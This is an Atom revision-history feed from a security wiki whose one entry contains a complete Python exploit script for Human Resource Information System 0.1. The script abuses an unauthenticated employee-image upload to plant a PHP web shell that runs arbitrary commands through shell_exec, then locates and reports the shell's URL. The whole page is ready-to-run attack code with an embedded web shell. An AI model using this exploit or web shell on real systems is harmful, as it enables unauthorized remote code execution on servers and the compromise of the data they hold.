<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Human_Resource_Information_System_0.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>Human Resource Information System 0.1 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Human_Resource_Information_System_0.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Human_Resource_Information_System_0.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T20:51:08Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Human_Resource_Information_System_0.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2726&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) # Date: 04-05-2021 # Exploit Author: Reza Afsahi # Vendor Homepa...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Human_Resource_Information_System_0.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2726&amp;oldid=prev"/>
		<updated>2021-05-08T02:04:45Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) # Date: 04-05-2021 # Exploit Author: Reza Afsahi # Vendor Homepa...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)&lt;br /&gt;
# Date: 04-05-2021&lt;br /&gt;
# Exploit Author: Reza Afsahi&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html&lt;br /&gt;
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&amp;amp;title=Human+Resource+Information+System+Using+PHP+with+Source+Code&lt;br /&gt;
# Version: 0.1&lt;br /&gt;
# Tested on: PHP 7.4.11 , Linux x64_x86&lt;br /&gt;
&lt;br /&gt;
############################################################################################################&lt;br /&gt;
&lt;br /&gt;
# Description:&lt;br /&gt;
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.&lt;br /&gt;
&lt;br /&gt;
############################################################################################################&lt;br /&gt;
&lt;br /&gt;
# Proof of concept:&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
from bs4 import BeautifulSoup&lt;br /&gt;
&lt;br /&gt;
def find_shell(domain):&lt;br /&gt;
    req_2 = requests.get(domain + &amp;quot;/Admin_Dashboard/Add_employee.php&amp;quot;)&lt;br /&gt;
    soup = BeautifulSoup(req_2.content , &amp;quot;html.parser&amp;quot;)&lt;br /&gt;
    imgs = soup.find_all(&amp;quot;img&amp;quot;)&lt;br /&gt;
    for i in imgs:&lt;br /&gt;
        src = i['src']&lt;br /&gt;
        if (&amp;quot;shell.php&amp;quot; in src):&lt;br /&gt;
            print(&amp;quot; [!] Your shell is ready :) ==&amp;gt; &amp;quot; + domain + &amp;quot;/Admin_Dashboard/&amp;quot; + src + &amp;quot;\n&amp;quot;)&lt;br /&gt;
            break&lt;br /&gt;
        else:&lt;br /&gt;
            continue&lt;br /&gt;
&lt;br /&gt;
def upload_file(domain):&lt;br /&gt;
&lt;br /&gt;
    print(&amp;quot;\n [!] Uploading Shell . . .&amp;quot;)&lt;br /&gt;
    payload =  &amp;quot;&amp;quot;&amp;quot; &lt;br /&gt;
    &amp;lt;!DOCTYPE html&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;head&amp;gt;&lt;br /&gt;
	&amp;lt;title&amp;gt; Shell &amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/head&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;&lt;br /&gt;
	&amp;lt;form action=&amp;quot;#&amp;quot; method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;input type=&amp;quot;text&amp;quot; name=&amp;quot;cmd&amp;quot; style=&amp;quot;width: 300px; height: 30px;&amp;quot; placeholder=&amp;quot;Your Command ...&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
		&amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;submit&amp;quot; value=&amp;quot;execute&amp;quot;&amp;gt;&lt;br /&gt;
	&amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;?php &lt;br /&gt;
	$cmd = $_POST['cmd'];&lt;br /&gt;
	$result = shell_exec($cmd);&lt;br /&gt;
	echo &amp;quot;&amp;lt;pre&amp;gt;{$result}&amp;lt;/pre&amp;gt;&amp;quot;;&lt;br /&gt;
	&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
    &amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
    h = {&lt;br /&gt;
        &amp;quot;Content-Type&amp;quot; : &amp;quot;multipart/form-data&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    f = {'employee_image':('shell.php',payload,&lt;br /&gt;
                    'application/x-php', {'Content-Disposition': 'form-data'}&lt;br /&gt;
              )&lt;br /&gt;
    }&lt;br /&gt;
    d = {&lt;br /&gt;
        &amp;quot;emplo&amp;quot;              : &amp;quot;&amp;quot;,&lt;br /&gt;
        &amp;quot;employee_companyid&amp;quot; : &amp;quot;test&amp;quot;,&lt;br /&gt;
        &amp;quot;employee_firstname&amp;quot; : &amp;quot;test&amp;quot;,&lt;br /&gt;
        &amp;quot;employee_lastname&amp;quot;  : &amp;quot;test&amp;quot;,&lt;br /&gt;
        &amp;quot;employee_middlename&amp;quot; : &amp;quot;test&amp;quot;,&lt;br /&gt;
        &amp;quot;branches_datefrom&amp;quot;  : &amp;quot;0011-11-11&amp;quot;,&lt;br /&gt;
        &amp;quot;branches_recentdate&amp;quot; : &amp;quot;2222-11-11&amp;quot;,&lt;br /&gt;
        &amp;quot;employee_position&amp;quot;  : &amp;quot;test&amp;quot;,&lt;br /&gt;
        &amp;quot;employee_contact&amp;quot;   : &amp;quot;23123132132&amp;quot;,&lt;br /&gt;
        &amp;quot;employee_sss&amp;quot;       : &amp;quot;test&amp;quot;,&lt;br /&gt;
        &amp;quot;employee_tin&amp;quot;       : &amp;quot;test&amp;quot;,&lt;br /&gt;
        &amp;quot;employee_hdmf_pagibig&amp;quot; : &amp;quot;test&amp;quot;,&lt;br /&gt;
        &amp;quot;employee_gsis&amp;quot;      : &amp;quot;test&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    url = domain + &amp;quot;/Admin_Dashboard/process/addemployee_process.php&amp;quot;&lt;br /&gt;
    req = requests.post(url , data=d , files = f)&lt;br /&gt;
    if req.status_code == 200:&lt;br /&gt;
        if (&amp;quot;Insert Successfully&amp;quot; in req.text):&lt;br /&gt;
            print(&amp;quot;\n [!] Shell uploaded succefully\n&amp;quot;)&lt;br /&gt;
            find_shell(domain)&lt;br /&gt;
&lt;br /&gt;
    else:&lt;br /&gt;
        print(&amp;quot;Exploit Failed 1&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
def main():&lt;br /&gt;
    if len(sys.argv) != 2:&lt;br /&gt;
        print('[!] usage: %s &amp;lt;target url&amp;gt; ' % sys.argv[0])&lt;br /&gt;
        print('[!] eg: %s http://vulndomain.com' % sys.argv[0])&lt;br /&gt;
        sys.exit(-1)&lt;br /&gt;
&lt;br /&gt;
    print(&amp;quot;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;quot;)&lt;br /&gt;
    print(&amp;quot;&amp;lt;&amp;gt;      Human Resource Information System     &amp;lt;&amp;gt;&amp;quot;)&lt;br /&gt;
    print(&amp;quot;&amp;lt;&amp;gt;               Shell Uploader               &amp;lt;&amp;gt;&amp;quot;)&lt;br /&gt;
    print(&amp;quot;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;lt;&amp;gt;&amp;quot;)&lt;br /&gt;
    target_domain = sys.argv[1]&lt;br /&gt;
    upload_file(target_domain)&lt;br /&gt;
&lt;br /&gt;
if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
  main()&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>